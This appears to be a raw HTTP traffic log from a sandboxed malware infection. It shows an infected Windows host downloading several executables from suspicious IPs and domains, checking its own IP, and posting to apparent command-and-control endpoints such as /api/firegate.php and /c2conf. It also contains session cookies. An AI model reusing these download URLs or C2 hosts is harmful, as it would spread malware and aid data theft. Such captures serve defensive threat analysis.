HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:57 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909628/u17799268/docs/d42/394ac12e1f34/asca1ex.bmp?extra=Nn4hYr7tnXNZZ7LDLvbU1rSSLUXCn-M157dB_N2zZbvxIJXU-s2CkT9fJsNnQ-wJKfLwlR45wy_ednBtypvZDvnn-i5cAyOHtd9nGm_2XJBLZcbe78raXMo9Yfh0VU3s7QrB7fG0cfxAPlvA X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909628/u17799268/docs/d42/394ac12e1f34/asca1ex.bmp?extra=Nn4hYr7tnXNZZ7LDLvbU1rSSLUXCn-M157dB_N2zZbvxIJXU-s2CkT9fJsNnQ-wJKfLwlR45wy_ednBtypvZDvnn-i5cAyOHtd9nGm_2XJBLZcbe78raXMo9Yfh0VU3s7QrB7fG0cfxAPlvA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:57 GMT Content-Type: image/x-ms-bmp Content-Length: 275020 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 20:52:44 GMT ETag: "6500cf9c-4324c" Expires: Fri, 13 Oct 2023 07:56:57 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c240331/u44017378/docs/d9/fa52acca0a25/PL_Client.bmp?extra=Gtk0NulK_t0Vg_w76xxYbYgKgQDrBcgCJoJgl3o3wL4Soyf9yXoN4y9JRWHxgfaYJkwVs046jyfvzE55PAyXiea2WR-q86s-1lM-sAnMQ1mOToUwfIvm5gd_Npnk_8d9vqhFfiSPARmxkQGX HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:58 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Thu, 07 Sep 2023 02:45:56 GMT ETag: "64f93964-383e04" Expires: Fri, 13 Oct 2023 07:56:58 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AgLnpOIFMHSrlujdzg%2BojSyDcYIo%2B6I35lXwqnXFQGIEFr2gGnoRCTiVkMUEvPBoP5L1DCzYhZKWFoHu4sGixEF9o8Kjn%2FQl7tt3lvqP1eErip20hylYELJRoQEPfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed659fa9c8d24-KIX

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: AC46E92A:284C_93878F2E:0050_65016B52_22F66090:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b%2FIrt5fc3qbLPI1YnKeCy%2BcBkH7sD5h0Yj5tFW8fYD0RrODRKIgC0VpkLVjKOnGsibkiXtkK%2BCGHlAtu4deYFewtARasBdDtleosbCSFX8PwRKfhqrACjh0WIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed67e0cce837c-KIX alt-svc: h3=":443"; ma=86400

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:57:24 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305705 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:57:33 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305653 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front225207 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /profiles/76561199550790047 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: steamcommunity.com

HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 13 Sep 2023 07:57:37 GMT Content-Length: 33432 Connection: keep-alive Set-Cookie: sessionid=2ba77a64b9b9837af3e37709; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None

GET /get/uTWorMyudp/hgjjhlkgkl.exe HTTP/1.1 Host: transfer.sh Connection: Keep-Alive

HTTP/1.1 200 OK Cache-Control: no-store Connection: keep-alive Content-Disposition: attachment; filename="hgjjhlkgkl.exe" Content-Length: 5719840 Content-Type: application/x-msdos-program Retry-After: Wed, 13 Sep 2023 09:57:54 GMT Server: Transfer.sh HTTP Server Vary: Range, Referer, X-Decrypt-Password X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 175.208.134.152 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1694591874 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Wed, 13 Sep 2023 07:57:49 GMT

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:18 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:19 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:27 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 4972 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.208 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 13 Sep 2023 04:35:19 GMT ETag: "71f400-605361638eb66" Accept-Ranges: bytes Content-Length: 7468032 Content-Type: application/x-msdos-program

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 13 Sep 2023 07:45:01 GMT ETag: "73000-60538bcaabea2" Accept-Ranges: bytes Content-Length: 471040 Content-Type: application/x-msdos-program

HEAD /love/no230.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.238 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 395776 Content-Type: application/octet-stream Last-Modified: Wed, 13 Sep 2023 15:56:12 GMT Accept-Ranges: bytes ETag: "415ccbd15ae6d91:0" Server: Microsoft-IIS/10.0 Date: Wed, 13 Sep 2023 15:56:28 GMT

HEAD /m/ela205.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ji.alie3ksgbb.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Content-Type: application/octet-stream Content-Length: 406528 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 14:02:57 GMT ETag: "65006f91-63400" Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bsXblAWPdDSfuw2f56%2B8V2m0s3U3dbUc8Rle8wr7tnj6KvGMYP5BGyw3UOMbzRT%2FK8XlZsrPSd4FJjN5sBTClkz7ywYnIUWkSsKfSgaXV17uGpEntBHT0cLiv3ANRcAr5eGjNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed5735fee831a-KIX alt-svc: h3=":443"; ma=86400

HEAD /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: williecampbell.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK date: Wed, 13 Sep 2023 07:56:28 GMT server: Apache/2.4.52 (Ubuntu) last-modified: Wed, 13 Sep 2023 07:45:02 GMT etag: "4aa00-60538bcb2dcda" accept-ranges: bytes content-length: 305664 content-type: application/x-msdos-program

GET /m/ela205.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ji.alie3ksgbb.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Content-Type: application/octet-stream Content-Length: 406528 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 14:02:57 GMT ETag: "65006f91-63400" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qzsgU17UcDImdqB4cINQ9JX9uo3GJGtpLDo1VNJrLx%2FVbxqQQNN7MVbE961dh%2FLy5yckZG7uPrIobFBNsQQgNzxT%2BbZIdi%2F69CTCosHA25Nw9Q8bcFfZLyB3rVC82rFpBzG%2BPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed574494b831a-KIX alt-svc: h3=":443"; ma=86400

GET /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.208 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 13 Sep 2023 04:35:19 GMT ETag: "71f400-605361638eb66" Accept-Ranges: bytes Content-Length: 7468032 Content-Type: application/x-msdos-program

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 13 Sep 2023 08:56:28 GMT Date: Wed, 13 Sep 2023 07:56:28 GMT Connection: keep-alive

GET /calc2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: williecampbell.top Cache-Control: no-cache

HTTP/1.1 200 OK date: Wed, 13 Sep 2023 07:56:28 GMT server: Apache/2.4.52 (Ubuntu) last-modified: Wed, 13 Sep 2023 07:45:02 GMT etag: "4aa00-60538bcb2dcda" accept-ranges: bytes content-length: 305664 content-type: application/x-msdos-program

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 13 Sep 2023 07:45:01 GMT ETag: "73000-60538bcaabea2" Accept-Ranges: bytes Content-Length: 471040 Content-Type: application/x-msdos-program

GET /love/no230.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.238 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 13 Sep 2023 15:56:12 GMT Accept-Ranges: bytes ETag: "415ccbd15ae6d91:0" Server: Microsoft-IIS/10.0 Date: Wed, 13 Sep 2023 15:56:28 GMT Content-Length: 395776

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 13 Sep 2023 07:56:29 GMT Content-Type: application/octet-stream Content-Length: 304128 Last-Modified: Wed, 13 Sep 2023 07:30:01 GMT Connection: keep-alive ETag: "650164f9-4a400" Accept-Ranges: bytes

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 13 Sep 2023 07:56:29 GMT Content-Type: application/octet-stream Content-Length: 304128 Last-Modified: Wed, 13 Sep 2023 07:30:01 GMT Connection: keep-alive ETag: "650164f9-4a400" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:29 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="gtpbd6xwha.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 561 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:03 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:04 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:07 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: TeslaBrowser/5.5 Host: worldtopnews.fun

HTTP/1.1 302 Found Date: Wed, 13 Sep 2023 07:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=64q34cpsiqdcmam0cpeeche9m6; expires=Sun, 07 Jan 2024 01:43:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 12 Nov 2023 07:57:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: /login CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W30b9omDvVpCqE7l9jQh3QORPfRFLuHT4rpKOWzw9y4t6MYAIN68xn299xZkD6Htd99qM8d2bmwnoJrcHqnrzPMS2pXK2XWG3%2FVp91SEsG%2B4aJgoVk8JD5A2z3F3W2xEFUZh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed67e6d901a02-KIX

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=HTQ6eTHJbOMZvn3eaFhw Content-Length: 213 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 5.42.92.211 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Sep 2023 07:57:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /e9c345fc99a4e67e.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHI Host: charlesjones.top Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK date: Wed, 13 Sep 2023 07:57:11 GMT server: Apache/2.4.41 (Ubuntu) content-length: 8 content-type: text/html; charset=UTF-8

GET /login HTTP/1.1 Connection: Keep-Alive User-Agent: TeslaBrowser/5.5 Host: worldtopnews.fun Cookie: xdober_setting_show_country=1; PHPSESSID=64q34cpsiqdcmam0cpeeche9m6

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4d6IWxwZJIm8Lh7YGnFxoQ5hXXDhGiuDmUINuAvRNwwLSOAGSAHlJIolrrRJaYHTwW2WP7m3VS51u5NK5wBQH8bwbudsnKHnw3hBgKZBloxSfyuqnV6wwAwXuDY%2BTIqpn8ZZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed6823bd71a02-KIX

POST /c2conf HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: worldtopnews.fun Content-Length: 42 Cache-Control: no-cache

HTTP/1.1 403 Forbidden Date: Wed, 13 Sep 2023 07:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LQJH%2FUP4h%2BynnlomZACPSUoRS2nJSyZXmvgDXQfe1Clhqi76gRAtCo20jMjks%2BwQNg5BoMH1xD23eVHO%2FGi7yQ%2BK3ZaiooHkdDn5g%2BHfeZMjnADtj0f2BRZ2eUBz%2B4cOzlrh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed6858c4e1a11-KIX

